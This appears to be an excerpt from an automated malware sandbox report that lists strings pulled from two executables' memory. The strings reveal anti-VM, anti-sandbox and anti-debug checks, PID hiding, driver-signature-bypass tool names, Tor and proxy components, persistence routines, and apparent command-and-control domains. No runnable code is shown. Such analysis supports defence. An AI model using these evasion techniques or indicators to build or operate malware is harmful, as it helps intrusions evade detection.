                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: psapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= p
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: STAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00 %+v m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3ca
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie$WINDIR% CPU (%03d %s%v: %#x, goid=, j0 = -nologo/delete19531252.5.4.32.5.
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: ameNewaPINGPOSTPathQEMUROOTH
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: ersexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindo
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: popcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: 11VBoxSFWINDIRWD
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: pclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: sse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BE
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: LycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd acceptactivechan<-closedcookiedirectdo
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: aryvmcixn-SR-%W
                          Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vmware
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: main.isRunningInsideVMWare
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: 4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: rSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: tVMSrvcs|!
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: 3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: ermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: sse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.2500
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
                          Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: DetectVirtualMachine
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4574735535.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \\.\HGFS`
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfsP
                          Source: file.exe, 00000000.00000000.2090227189.0000000001282000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <Module>latestumma.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributelatestummaEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksbgsai2sls3h.resources
